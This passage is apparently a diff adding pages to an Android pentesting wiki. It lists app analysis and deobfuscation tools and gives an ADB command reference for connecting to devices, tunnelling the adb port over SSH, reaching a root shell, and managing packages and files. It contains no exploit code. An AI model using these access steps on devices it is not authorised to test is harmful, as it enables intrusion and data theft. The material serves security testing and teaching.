[AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework) + +AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. +[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases) + +```text +python androbugs.py -f [APK file] +androbugs.exe -f [APK file] +``` + +### [Androwarn](https://github.com/maaaaz/androwarn) + +**Androwarn** is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application. + +The detection is performed with the **static analysis** of the application's Dalvik bytecode, represented as **Smali**, with the [`androguard`](https://github.com/androguard/androguard) library. + +This tool looks for **common behavior of "bad" applications** like: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution... + +```text +python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 +``` + +### [MARA Framework](https://github.com/xtiankisutsa/MARA_Framework) + +![](../../.gitbook/assets/image%20%2810%29.png) + +**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals. + +It is able to: + +* Extract Java and Smali code using different tools +* Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD) +* Extract private information from the APK using regexps. +* Analyze the Manifest. +* Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb) +* Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com/) + +### Koodous + +Useful to detect malware: [https://koodous.com/](https://koodous.com/) + +## Obfuscating/Deobfuscating code + +Note that depending the service and configuration you use to obfuscate the code. Secrets may or may not ended obfuscated. + +### [ProGuard](https://en.wikipedia.org/wiki/ProGuard_%28software%29) + +**ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2. + +ProGuard is distributed as part of the Android SDK and runs when building the application in release mode. + +From: [https://en.wikipedia.org/wiki/ProGuard\_\(software\)](https://en.wikipedia.org/wiki/ProGuard_%28software%29) + +### [DeGuard](http://apk-deguard.com/) + +#### DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries. + +You can upload an obfuscated APK to their platform. + +### [Simplify](https://github.com/CalebFenton/simplify) + +It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used. + +### [APKiD](https://github.com/rednaga/APKiD) + +APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android. + +### Manual + +[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)\*\*\*\* + +## Labs + +### [Androl4b](https://github.com/sh4hin/Androl4b) + +AndroL4b is an Android security virtual machine based on ubuntu-mate includes the collection of latest framework, tutorials and labs from different security geeks and researchers for reverse engineering and malware analysis. + +### OWASP + +{% embed url="https://github.com/OWASP/owasp-mstg%0Ahttps://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" caption="" %} + +### Git Repos + +[https://github.com/riddhi-shree/nullCommunity/tree/master/Android](https://github.com/riddhi-shree/nullCommunity/tree/master/Android) +[https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab\_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec) + +## References + +For more information visit: + +* [https://appsecwiki.com/\#/](https://appsecwiki.com/#/) It is a great list of resources +* [https://maddiestone.github.io/AndroidAppRE/](https://maddiestone.github.io/AndroidAppRE/) Android quick course +* [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/) +* [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh) + +## To Test + +* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) +* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) + diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md new file mode 100644 index 00000000000..676ff5ab654 --- /dev/null +++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md @@ -0,0 +1,411 @@ +# ADB Commands + +**Adb is usually located in:** + +```bash +#Windows +C:\Users\\AppData\Local\Android\sdk\platform-tools\adb.exe + +#MacOS +/Users//Library/Android/sdk/platform-tools/adb +``` + +**Information obtained from:** [**http://adbshell.com/**](http://adbshell.com/)\*\*\*\* + +## Connection + +```text +adb devices +``` + +This will list the connected devices; if "_**unathorised**_" appears, this means that you have to **unblock** your **mobile** and **accept** the connection. + +This indicates to the device that it has to start and adb server in port 5555: + +```text +adb tcpip 5555 +``` + +Connect to that IP and that Port: + +```text +adb connect : +``` + +If you get an error like the following in a Virtual Android software \(like Genymotion\): + +```text +adb server version (41) doesn't match this client (36); killing... +``` + +It's because you are trying to connect to an ADB server with a different version. Just try to find the adb binary the software is using \(go to `C:\Program Files\Genymobile\Genymotion` and search for adb.exe\) + +### Several devices + +Whenever you find **several devices connected to your machine** you will need to **specify in which one** you want to run the adb command. + +```bash +adb devices +List of devices attached +10.10.10.247:42135 offline +127.0.0.1:5555 device +``` + +```bash +adb -s 127.0.0.1:5555 shell +x86_64:/ # whoami +root +``` + +### Port Tunneling + +In case the **adb** **port** is only **accessible** from **localhost** in the android device but **you have access via SSH**, you can **forward the port 5555** and connect via adb: + +```bash +ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222 +adb connect 127.0.0.1:5555 +``` + +## Packet Manager + +### Install/Uninstall + +#### adb install \[option\] <path> + +```text +adb install test.apk +``` + +```text +adb install -l test.apk forward lock application +``` + +```text +adb install -r test.apk replace existing application +``` + +```text +adb install -t test.apk allow test packages +``` + +```text +adb install -s test.apk install application on sdcard +``` + +```text +adb install -d test.apk allow version code downgrade +``` + +```text +adb install -p test.apk partial application install +``` + +#### adb uninstall \[options\] <PACKAGE> + +```text +adb uninstall com.test.app +``` + +```text +adb uninstall -k com.test.app Keep the data and cache directories around after package removal. +``` + +### Packages + +Prints all packages, optionally only those whose package name contains the text in <FILTER>. + +#### adb shell pm list packages \[options\] <FILTER-STR> + +```text +adb shell pm list packages +``` + +```text +adb shell pm list packages -f #See their associated file. +``` + +```text +adb shell pm list packages -d #Filter to only show disabled packages. +``` + +```text +adb shell pm list packages -e #Filter to only show enabled packages. +``` + +```text +adb shell pm list packages -s #Filter to only show system packages. +``` + +```text +adb shell pm list packages -3 #Filter to only show third party packages. +``` + +```text +adb shell pm list packages -i #See the installer for the packages. +``` + +```text +adb shell pm list packages -u #Also include uninstalled packages. +``` + +```text +adb shell pm list packages --user #The user space to query. +``` + +#### adb shell pm path <PACKAGE> + +Print the path to the APK of the given . + +```text +adb shell pm path com.android.phone +``` + +#### adb shell pm clear <PACKAGE> + +Delete all data associated with a package. + +```text +adb shell pm clear com.test.abc +``` + +## File Manager + +#### adb pull <remote> \[local\] + +Download a specified file from an emulator/device to your computer. + +```text +adb pull /sdcard/demo.mp4 ./ +``` + +#### adb push <local> <remote> + +Upload a specified file from your computer to an emulator/device. + +```text +adb push test.apk /sdcard +``` + +## Screencapture/Screenrecord + +#### adb shell screencap <filename> + +Taking a screenshot of a device display. + +```text +adb shell screencap /sdcard/screen.png +``` + +#### adb shell screenrecord \[options\] <filename> + +Recording the display of devices running Android 4.4 \(API level 19\) and higher. + +```text +adb shell screenrecord /sdcard/demo.mp4 +adb shell screenrecord --size +adb shell screenrecord --bit-rate +adb shell screenrecord --time-limit